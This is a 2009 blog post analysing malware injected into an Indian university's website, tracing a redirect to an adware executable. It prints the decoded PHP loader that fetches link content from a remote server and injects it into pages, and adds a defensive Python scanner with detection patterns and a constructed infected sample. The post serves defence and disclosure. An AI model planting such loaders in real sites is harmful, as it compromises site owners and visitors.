Friday, October 9, 2009

Premier University of Andhra Pradesh Serving Malware.

A couple of days back I reported the infection to a few security researchers through OWASP. Now Firefox and Google say the same!! If we visit the site, the Firefox browser alerts you with the following warning:

Another way to confirm that the site is serving malicious pages or malware: type "nagarjunauniversity" into the Google search box and open the first link.

Google's description of the pages hosted by is:

Real time view of malicious pages and Analysis
Visiting the site greets you with script execution; see the diagram below.
Viewing the source of this page makes you pause: why are Chinese and Russian links present on a university page? Have a glimpse at the code.

When I reported the incident on OWASP, base64-encoded code was present on this page. Don't worry, the code is still present, but on other pages. As I am writing this blog, base64-encoded content was present on the following pages, and many more:
The source code of either of these pages looks like this:
If you look carefully you can see a site name that is partially percent-encoded (URL encoding).
Google's description mentioned the domain.
When we open the above site it redirects to a page that hosts *SmartDownload.exe*.

VirusTotal identifies the EXE as *Win32/CasOnline!Adware*. Further details about the binary can be found at

Decoding the base64 content with the base64_decode() call present in the malicious page (the familiar eval(base64_decode('...')) pattern) gives the script below, which is passed as an argument to eval(); eval() then executes it:


$links = new GetLinks();

echo $links->Links;

class GetLinks
{
    var $host = "";                 // remote link server (domain removed in this post)
    var $path = "/link.php?site=";
    var $site = "";
    var $user_agent = "";

    var $Links = "";

    var $_socket_timeout = 12;
    var $_cashe_life_time = 3600;   // re-fetch the injected links once an hour
    var $_cashe_file = "cashe.txt";

    function GetLinks()
    {
        // Refresh the cache if it is missing, empty, or older than an hour
        if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {
            // The infected host name (and visitor's browser) are reported to the link server
            $this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
            $this->user_agent = $_SERVER['HTTP_USER_AGENT'];

            $this->Links = $this->fetch_remote_file();
            if ($handle = fopen($this->_cashe_file, 'w')) {
                fwrite($handle, $this->Links);
                fclose($handle);
            }
        } else {
            $this->Links = file_get_contents($this->_cashe_file);
        }
    }

    function fetch_remote_file()
    {
        $buff = '';
        $fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
        if (!$fp) {
            // (empty in the captured sample)
        } else {
            // Hand-rolled HTTP GET for /link.php?site=<infected host>
            $out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
            $out .= "Host: {$this->host}\r\n";
            $out .= "Connection: Close\r\n\r\n";

            fwrite($fp, $out);
            while (!feof($fp)) {
                $buff .= fgets($fp, 128);
            }
            fclose($fp);
            // Drop the HTTP headers; everything after the blank line is the injected HTML
            $page = explode("\r\n\r\n", $buff);
            return $page[1];
        }
    }
}
I am not sure what cashe.txt does or what its contents are!
The HTML tag responsible for pulling in the scripts, malware, etc. from the remote hosts is IFRAME.
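To hunt for this kind of loader across a whole web root, here is an added example (my own code, not anything from the infected site or from this post): a Python scanner that finds eval(base64_decode('...')) in PHP files, decodes the payload, percent-decodes it the way the partly URL-encoded link above needs, and reports the fsockopen/iframe indicators and the URLs the payload reaches. The sample index.php and the links.example.invalid hostname are constructed for the demo and are not the real pages or link server.

```python
"""Hunt for eval(base64_decode(...)) loaders in PHP files and surface what they hide.

Added example for this post (not code from the infected site or its cleanup).
Assumptions: the loader is written as eval(base64_decode('...')) and the sample
web root below is constructed, not taken from the real site.
"""
from __future__ import annotations

import base64
import binascii
import pathlib
import re
import sys
import urllib.parse

# eval(base64_decode("...")) / eval(base64_decode('...')), tolerating whitespace and line breaks.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)

# Strings you expect in an injected link/iframe loader, not in ordinary site code.
INDICATORS = (
    "fsockopen", "curl_exec", "file_get_contents", "<iframe",
    "$_SERVER['HTTP_HOST']", "HTTP_USER_AGENT", "link.php",
)


def decode_payload(b64: str) -> str:
    """Strip whitespace, repair missing padding and decode; latin-1 keeps every byte readable."""
    cleaned = re.sub(r"\s+", "", b64)
    cleaned += "=" * (-len(cleaned) % 4)
    try:
        return base64.b64decode(cleaned).decode("latin-1")
    except (binascii.Error, ValueError):
        return ""


def find_payloads(php_source: str) -> list[str]:
    """Return the decoded body of every eval(base64_decode(...)) found in the source."""
    return [decode_payload(m.group(1)) for m in EVAL_B64.finditer(php_source)]


def extract_urls(decoded: str) -> list[str]:
    """Percent-decode the payload (the post's link was partly URL-encoded) and pull out URLs."""
    text = urllib.parse.unquote(decoded)
    return sorted(set(re.findall(r"https?://[^\s'\"<>]+", text)))


def triage(php_source: str) -> dict:
    """Summarise one file: hidden payload count, indicators that fired, URLs the payloads reach."""
    payloads = find_payloads(php_source)
    hits = sorted({ind for p in payloads for ind in INDICATORS if ind in p})
    urls = sorted({u for p in payloads for u in extract_urls(p)})
    return {"payloads": len(payloads), "indicators": hits, "urls": urls}


def scan_tree(root: str) -> dict[str, dict]:
    """Walk a web root and report every .php file that carries a hidden payload."""
    results = {}
    for path in pathlib.Path(root).rglob("*.php"):
        try:
            src = path.read_text(encoding="latin-1")
        except OSError:
            continue
        r = triage(src)
        if r["payloads"]:
            results[str(path)] = r
    return results


# Constructed sample: a fake index.php with an injected loader modelled on the one in this post.
# The hostname is a placeholder under the reserved .invalid TLD, not the real link server.
_INJECTED_PHP = (
    "$links = new GetLinks(); echo $links->Links;\n"
    "$fp = fsockopen($this->host, 80); "
    "$out = \"GET /link.php?site=\" . $_SERVER['HTTP_HOST'];\n"
    "echo '<iframe src=\"http%3A%2F%2Flinks.example.invalid%2Fl.php\" "
    "width=\"0\" height=\"0\"></iframe>';\n"
)
SAMPLE_INDEX_PHP = (
    "<?php\n$title = 'Home';\n"
    "eval(base64_decode('" + base64.b64encode(_INJECTED_PHP.encode()).decode() + "'));\n"
    "?>\n<html><body><h1><?php echo $title; ?></h1></body></html>\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for name, r in scan_tree(sys.argv[1]).items():
            print(name, r)
    else:
        print(triage(SAMPLE_INDEX_PHP))
```

Run it with the web root as the first argument to list every infected file; with no argument it triages the constructed sample. Decoding is done offline and nothing is ever evaluated, so the scanner is safe to run on a live compromised host, and the URLs it reports are the hosts to block at the proxy and to compare against the domain Google flagged.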
The next blog post will most probably be a binary analysis of SmartDownload.exe. Safe surfing!!!